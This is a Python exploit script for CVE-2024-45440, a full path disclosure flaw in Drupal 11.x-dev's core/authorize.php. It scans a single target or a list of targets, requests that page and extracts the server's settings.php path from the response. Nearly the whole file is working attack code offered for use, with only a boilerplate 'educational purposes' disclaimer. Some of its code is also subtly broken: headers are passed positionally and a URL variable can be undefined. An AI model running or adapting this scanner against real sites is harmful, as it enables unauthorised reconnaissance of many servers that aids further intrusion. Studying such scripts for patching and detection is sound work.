#!/usr/bin/env python
# Exploit Title: Drupal 11.x-dev - Full Path Disclosure
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# Version: 11.x-dev
# CVE: CVE-2024-45440

# -*- coding:UTF-8 -*-
import re
import requests
def banners():
    cve_id = "CVE-2024-45440"
    description = "Drupal 11.x-dev Full Path Disclosure Vulnerability: " \
                  "core/authorize.php allows Full Path Disclosure (even
when error logging is None) " \
                  "if the value of hash_salt is file_get_contents of a file
that does not exist."
    disclaimer = "This tool is for educational purposes only. Any misuse of
this information is the responsibility of " \
                 "the person utilizing this tool. The author assumes no
responsibility or liability for any misuse or " \
                 "damage caused by this program."
    width = 100
    banner_top_bottom = "=" * width
    banner_middle = f"{cve_id:^{width}}\n\n{description:^{width}}"
    banner =
f"{banner_top_bottom}\n\n{banner_middle}\n\n{disclaimer}\n\n{banner_top_bottom}"

    return banner
def scan_single_url(url=None):
    if url is None:
        print("[+] Input the IP/Domain Example: 127.0.0.1 or 127.0.0.1:8080")

        url = input("[+] IP/Domain: ")
    if not url.startswith('https://') and not url.startswith('http://'):
        full_url = 'http://' + url + '/core/authorize.php'
    print("[*] Scanning...")
    try:
        headers = {
            "Host": url,
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64;
rv:133.0) Gecko/20100101 Firefox/133.0",
            "Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
        }
        response = requests.get(full_url, headers,timeout=10)
        pattern = r'<em class="placeholder">(/.*?settings\.php)'
        matches = re.findall(pattern, response.text)
        # print(response.text)
        if 'settings.php' in response.text:
            print(f"[+] {url} Existed!")
            for match in matches:
                print("[+] The full path is:", match)
                return True
        else:
            print(f"[-] {url} Not Exist!")
            return False
    except TimeoutError:
        print(f"[-] {url} Timeout!")
    except Exception as e:
        print(f"[-] {url} Failed!")
        return False
def scan_multiple_urls():
    print("[+] Input the path of txt Example: ./url.txt or
C:\\the\\path\\to\\url.txt")
    url_path = input("[+] Path: ")
    url_list = []
    result_list = []
    try:
        with open(url_path, 'r', encoding='utf-8') as f:
            lines = f.readlines()
            for line in lines:
                url_list.append(line.strip())
    except FileNotFoundError as e:
        print("[-] File Not Found!")
    for url in url_list:
        result = scan_single_url(url)
        if result:
            result_list.append(url)
    print("[+] Successful Target:")
    for result in result_list:
        print(f"[+] {result}")
def main():
    print(banners())
    print("[1] Scan single url\n[2] Scan multiple urls")
    choice = input("[+] Choose: ")
    if choice == '1':
        scan_single_url()
    elif choice == '2':
        scan_multiple_urls()
    else:
        print("[-] Invalid option selected!")
    pass
if __name__ == '__main__':
    main()